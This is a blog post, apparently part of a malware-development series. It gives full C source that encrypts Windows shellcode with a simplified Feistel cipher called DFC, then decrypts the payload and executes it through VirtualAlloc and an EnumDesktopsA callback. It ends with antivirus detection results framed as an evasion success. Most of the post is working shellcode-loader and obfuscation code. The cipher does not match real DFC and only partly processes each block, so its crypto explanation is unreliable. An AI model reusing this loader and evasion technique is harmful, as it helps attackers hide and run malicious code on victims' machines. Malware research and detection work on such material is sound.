Malware and cryptography 34: encrypt payload via DFC algorithm. Simple C example.
﷽
Hello, cybersecurity enthusiasts and white hackers!
After my presentation and workshop at a conference in Luxembourg where I touched on the abuse of cryptographic functions in the internal structure of Windows OS, many colleagues and readers increasingly have questions about the use of cryptography in protecting malware during its development.
This post is the result of my own research on using DFC (Decorrelated Fast Cipher) on malware development. As usual, exploring various crypto algorithms, I decided to check what would happen if we apply this to encrypt/decrypt the payload.
DFC
The Decorrelated Fast Cipher (DFC) was developed in 1998
by cryptographers from the École Normale Supérieure, the CNRS, and France Telecom under the leadership of Serge Vaudenay. Designed as a candidate for the Advanced Encryption Standard (AES) competition, DFC is a symmetric block cipher using an 8-round
Feistel network and a 128-bit
block size. Though ultimately not selected as the AES standard, DFC contributed to cryptographic research, particularly in the PEANUT family of ciphers.
The Decorrelated Fast Cipher (DFC) based on an 8-round
Feistel network, with each round processing a 128-bit
block divided into two 64-bit
halves. DFC uses a key schedule to generate 8 unique round keys from a variable-length key of up to 256
bits, while it is commonly implemented with a 128-bit
key. Each round applies a particular encryption function to one half of the block, combines it with the other half, then swaps the halves - a classic Feistel structure that allows for simple decryption by reversing the sequence of the keys.
DFC’s architecture seeks to give excellent security against differential and linear cryptanalysis, and it is notable for using decorrelation theory, which reduces statistical relationships inside encrypted data in order to resist modern cryptographic assaults. Each round’s encryption function employs a pair of 64-bit subkeys derived from the main key, making the cipher suitable for hardware and software implementations.
Although DFC was not chosen as the final AES standard, it presented novel techniques to resisting decorrelation-based attacks, stressing strong security features for symmetric block ciphers. DFC is now a member of the larger PEANUT family (Pretty Encryption Algorithm with n-Universal Transformation), which is notable for using unique mathematical transformations to increase its resistance to cryptanalysis.
practical example
Let’s implement it in practice. Let’s break down the implementation step by step to understand how the DFC-based encryption and decryption functions need to be implemented, focusing on the encryption of a payload. This approach will help you understand each part of the code and how it contributes to the functionality of the DFC cipher.
First of all define constants and key variables:
#define ROUNDS 8
#define BLOCK_SIZE 16
Then we need key schedule generation.
The key schedule function generates eight 128-bit
round keys based on the original encryption key. These round keys are used in each of the Feistel rounds to perform operations on each half of the data block:
void key_schedule(uint8_t* key) {
for (int i = 0; i < ROUNDS; i++) {
for (int j = 0; j < 16; j++) {
K[i][j] = key[j] ^ (i + j);
}
}
}
The round keys are derived by XORing each byte of the main key with the round and byte indices, creating unique keys for each round.
The next one is implement the Feistel round function. In DFC, each round performs operations on the left and right halves of the block. The round function is defined as G
, which takes the left
and right
halves of the block, and a roundKey
.
This function: swaps the left and right halves and XORs the left half (after applying F
function) with the right half and the current round key:
// DFC G function applies Feistel structure in each round
void G(uint32_t* left, uint32_t* right, uint8_t* roundKey) {
uint32_t tempRight = *right;
*right = *left ^ F(*right, *(uint32_t*)roundKey);
*left = tempRight;
}
F
is the core function of the Feistel structure. In my implementation, the F
function for the Decorrelated Fast Cipher (DFC) round uses a bitwise rotation and XOR operation to introduce non-linearity and diffusion in each round:
// function F for DFC round (simplified for illustration)
uint32_t F(uint32_t left, uint32_t key_part) {
return rotl(left + key_part, 3) ^ key_part;
}
Here, left
param is typically the left
half of the data block in the Feistel round, key_part
is a 32-bit
portion of the round key, specific to each Feistel round.
The main logic of this function is simple.
The left
input (half of the data block) is added to the key_part
. This addition introduces dependency on both the current data and the key, making each round sensitive to the specific round key.
The result of the addition is then rotated left by 3 bits (rotl(..., 3)
). Bitwise rotation is used here to disperse the bits across the data, enhancing diffusion. The rotl
function shifts bits to the left by 3
positions, with the leftmost bits wrapping around to the right.
Finally, the result of the rotation is XORed with key_part
. XOR
introduces further non-linearity and ensures that small changes in key_part
or left
lead to significant changes in the output of F
.
The next function we needed is block encryption logic.
The dfc_encrypt
function performs the encryption in a Feistel structure over 8 rounds
. Each round uses a different round key generated from the key schedule:
// DFC encryption function
void dfc_encrypt(uint32_t* block, uint8_t* key) {
uint32_t left = block[0], right = block[1];
// perform 8 rounds of encryption
for (int i = 0; i < ROUNDS; i++) {
G(&left, &right, K[i]);
}
// final left-right swap
block[0] = right;
block[1] = left;
}
This function initializes left
and right
from the input block. Then for each of the 8 rounds
, applies the G
function to left
and right
with the corresponding round key. Finally, swaps left
and right
to complete the Feistel round and update the block.
The decryption function dfc_decrypt
mirrors the encryption, but the rounds are applied in reverse order:
// DFC decryption function
void dfc_decrypt(uint32_t* block, uint8_t* key) {
uint32_t left = block[0], right = block[1];
// perform 8 rounds of decryption in reverse
for (int i = ROUNDS - 1; i >= 0; i--) {
G(&left, &right, K[i]);
}
// final left-right swap
block[0] = right;
block[1] = left;
}
As usual, dfc_encrypt_shellcode
prepares shellcode for encryption by applying padding and then encrypting each 128-bit
block:
// function to encrypt shellcode using DFC
void dfc_encrypt_shellcode(unsigned char* shellcode, int shellcode_len, uint8_t* key) {
key_schedule(key); // generate subkeys
int i;
uint32_t* ptr = (uint32_t*)shellcode;
for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
dfc_encrypt(ptr, key);
ptr += 4; // move to the next 128-bit block (4 * 32-bit words)
}
// handle remaining bytes by padding with 0x90 (NOP)
int remaining = shellcode_len % BLOCK_SIZE;
if (remaining != 0) {
unsigned char pad[BLOCK_SIZE] = { 0x90 };
memcpy(pad, ptr, remaining);
dfc_encrypt((uint32_t*)pad, key);
memcpy(ptr, pad, remaining);
}
}
This function calls key_schedule
to initialize round keys. Then encrypts the main shellcode in 128-bit
blocks. And applies padding if the shellcode length is not a multiple of the block size.
The next one is decryption logic:
// function to decrypt shellcode using DFC
void dfc_decrypt_shellcode(unsigned char* shellcode, int shellcode_len, uint8_t* key) {
key_schedule(key); // generate subkeys
int i;
uint32_t* ptr = (uint32_t*)shellcode;
for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
dfc_decrypt(ptr, key);
ptr += 4;
}
// handle remaining bytes by padding
int remaining = shellcode_len % BLOCK_SIZE;
if (remaining != 0) {
unsigned char pad[BLOCK_SIZE] = { 0x90 };
memcpy(pad, ptr, remaining);
dfc_decrypt((uint32_t*)pad, key);
memcpy(ptr, pad, remaining);
}
}
Finally, putting it all together in main
:
int main() {
unsigned char my_payload[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";
int my_payload_len = sizeof(my_payload);
int pad_len = my_payload_len + (BLOCK_SIZE - my_payload_len % BLOCK_SIZE) % BLOCK_SIZE;
unsigned char padded[pad_len];
memset(padded, 0x90, pad_len); // pad with NOPs
memcpy(padded, my_payload, my_payload_len);
printf("original shellcode:\n");
for (int i = 0; i < my_payload_len; i++) {
printf("%02x ", my_payload[i]);
}
printf("\n\n");
uint8_t key[8] = { 0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0 };
dfc_encrypt_shellcode(padded, pad_len, key);
printf("encrypted shellcode:\n");
for (int i = 0; i < pad_len; i++) {
printf("%02x ", padded[i]);
}
printf("\n\n");
dfc_decrypt_shellcode(padded, pad_len, key);
printf("decrypted shellcode:\n");
for (int i = 0; i < my_payload_len; i++) {
printf("%02x ", padded[i]);
}
printf("\n\n");
// allocate and execute decrypted shellcode
LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, padded, my_payload_len);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
return 0;
}
As you can, see in the main function I just encrypted/decrypted meow-meow
messagebox payload.
Full source code hack.c
:
/*
* hack.c
* encrypt/decrypt payload via DFC (Decorrelated Fast Cipher) algorithm
* author: @cocomelonc
* https://cocomelonc.github.io/malware/2024/11/10/malware-cryptography-34.html
*/
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <stdlib.h>
#include <windows.h>
#define ROUNDS 8 // DFC uses 8 rounds of encryption
#define BLOCK_SIZE 16 // DFC operates on 128-bit (16-byte) blocks
// subkeys generated from the main key
uint8_t K[ROUNDS][16];
// rotate left function
uint32_t rotl(uint32_t x, int shift) {
return (x << shift) | (x >> (32 - shift));
}
// function F for DFC round (simplified for illustration)
uint32_t F(uint32_t left, uint32_t key_part) {
return rotl(left + key_part, 3) ^ key_part;
}
// DFC G function applies Feistel structure in each round
void G(uint32_t* left, uint32_t* right, uint8_t* roundKey) {
uint32_t tempRight = *right;
*right = *left ^ F(*right, *(uint32_t*)roundKey);
*left = tempRight;
}
// key schedule for DFC
void key_schedule(uint8_t* key) {
for (int i = 0; i < ROUNDS; i++) {
for (int j = 0; j < 16; j++) {
K[i][j] = key[j % 8] ^ (i + j); // generate subkey for each round
}
}
}
// DFC encryption function
void dfc_encrypt(uint32_t* block, uint8_t* key) {
uint32_t left = block[0], right = block[1];
// perform 8 rounds of encryption
for (int i = 0; i < ROUNDS; i++) {
G(&left, &right, K[i]);
}
// final left-right swap
block[0] = right;
block[1] = left;
}
// DFC decryption function
void dfc_decrypt(uint32_t* block, uint8_t* key) {
uint32_t left = block[0], right = block[1];
// perform 8 rounds of decryption in reverse
for (int i = ROUNDS - 1; i >= 0; i--) {
G(&left, &right, K[i]);
}
// final left-right swap
block[0] = right;
block[1] = left;
}
// function to encrypt shellcode using DFC
void dfc_encrypt_shellcode(unsigned char* shellcode, int shellcode_len, uint8_t* key) {
key_schedule(key); // generate subkeys
int i;
uint32_t* ptr = (uint32_t*)shellcode;
for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
dfc_encrypt(ptr, key);
ptr += 4; // move to the next 128-bit block (4 * 32-bit words)
}
// handle remaining bytes by padding with 0x90 (NOP)
int remaining = shellcode_len % BLOCK_SIZE;
if (remaining != 0) {
unsigned char pad[BLOCK_SIZE] = { 0x90 };
memcpy(pad, ptr, remaining);
dfc_encrypt((uint32_t*)pad, key);
memcpy(ptr, pad, remaining);
}
}
// function to decrypt shellcode using DFC
void dfc_decrypt_shellcode(unsigned char* shellcode, int shellcode_len, uint8_t* key) {
key_schedule(key); // generate subkeys
int i;
uint32_t* ptr = (uint32_t*)shellcode;
for (i = 0; i < shellcode_len / BLOCK_SIZE; i++) {
dfc_decrypt(ptr, key);
ptr += 4;
}
// handle remaining bytes by padding
int remaining = shellcode_len % BLOCK_SIZE;
if (remaining != 0) {
unsigned char pad[BLOCK_SIZE] = { 0x90 };
memcpy(pad, ptr, remaining);
dfc_decrypt((uint32_t*)pad, key);
memcpy(ptr, pad, remaining);
}
}
int main() {
unsigned char my_payload[] =
"\xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41"
"\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60"
"\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72"
"\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac"
"\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2"
"\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48"
"\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f"
"\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49"
"\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01"
"\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01"
"\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41"
"\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b"
"\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58"
"\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41"
"\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7"
"\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\x1a\x01\x00\x00\x3e"
"\x4c\x8d\x85\x25\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83"
"\x56\x07\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x4d\x65\x6f\x77\x2d\x6d\x65\x6f\x77\x21\x00\x3d\x5e"
"\x2e\x2e\x5e\x3d\x00";
int my_payload_len = sizeof(my_payload);
int pad_len = my_payload_len + (BLOCK_SIZE - my_payload_len % BLOCK_SIZE) % BLOCK_SIZE;
unsigned char padded[pad_len];
memset(padded, 0x90, pad_len); // pad with NOPs
memcpy(padded, my_payload, my_payload_len);
printf("original shellcode:\n");
for (int i = 0; i < my_payload_len; i++) {
printf("%02x ", my_payload[i]);
}
printf("\n\n");
uint8_t key[8] = { 0x12, 0x34, 0x56, 0x78, 0x9A, 0xBC, 0xDE, 0xF0 };
dfc_encrypt_shellcode(padded, pad_len, key);
printf("encrypted shellcode:\n");
for (int i = 0; i < pad_len; i++) {
printf("%02x ", padded[i]);
}
printf("\n\n");
dfc_decrypt_shellcode(padded, pad_len, key);
printf("decrypted shellcode:\n");
for (int i = 0; i < my_payload_len; i++) {
printf("%02x ", padded[i]);
}
printf("\n\n");
// allocate and execute decrypted shellcode
LPVOID mem = VirtualAlloc(NULL, my_payload_len, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
RtlMoveMemory(mem, padded, my_payload_len);
EnumDesktopsA(GetProcessWindowStation(), (DESKTOPENUMPROCA)mem, NULL);
return 0;
}
As usual some printing logic is just for checking correctness of logic and running payload via EnumDesktopsA.
demo
Let’s go to see everything in action. Compile it (in my linux
machine):
x86_64-w64-mingw32-gcc -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
Then, just run it in the victim’s machine (windows 11 x64
in my case):
.\hack.exe
As you can see, everything is worked perfectly! =^..^=
Calculating Shannon entropy:
python3 entropy.py -f hack.exe
Our payload in the .text
section.
Scanning via Malware scanner:
https://websec.net/scanner/result/8d7862b2-dbba-48bb-924c-a3694cac3269
Upload to VirusTotal:
As you can see, only 29 of 72 AV engines detect our file as malicious.
Interesting result.
As you know, many of the encryption algorithms I have looked at in my research and on this blog are used Feistel networks.
cryptoanalysis
The cryptanalysis of Decorrelated Fast Cipher (DFC) has revealed vulnerabilities in its structure, particularly through differential analysis. In 1999, cryptographers Lars Knudsen and Vincent Rijmen (Lars R. Knudsen and Vincent Rijmen. “On The Decorrelated Fast Cipher (DFC) and Its Theory”. Department of Informatics, University of Bergen, N-5020 Bergen. 24 March 1999. 6th International Workshop on Fast Software Encryption (FSE ‘99). Rome: Springer-Verlag. pp. 81–94) discovered that DFC’s 8-round structure could be weakened using differential attacks. Their work demonstrated that a differential attack could successfully break 6 of DFC’s 8 rounds, exploiting the cipher’s susceptibility to differences introduced in specific parts of its Feistel rounds. This attack revealed weaknesses in the diffusion properties of DFC, indicating that, although designed for the AES competition, DFC was less resistant to cryptanalytic techniques than some other candidates.
I hope this post is useful for malware researchers, C/C++ programmers, spreads awareness to the blue teamers of this interesting encrypting technique, and adds a weapon to the red teamers arsenal.
https://en.wikipedia.org/wiki/DFC_(cipher)
On The Decorrelated Fast Cipher (DFC) and Its Theory. Lars R. Knudsen and Vincent Rijmen
Malware And Hunting For Persistence: How Adversaries Exploit Your Windows? - Cocomelonc. HACKLU 2024
Malware and cryptography 1
source code in github
This is a practical case for educational purposes only.
Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine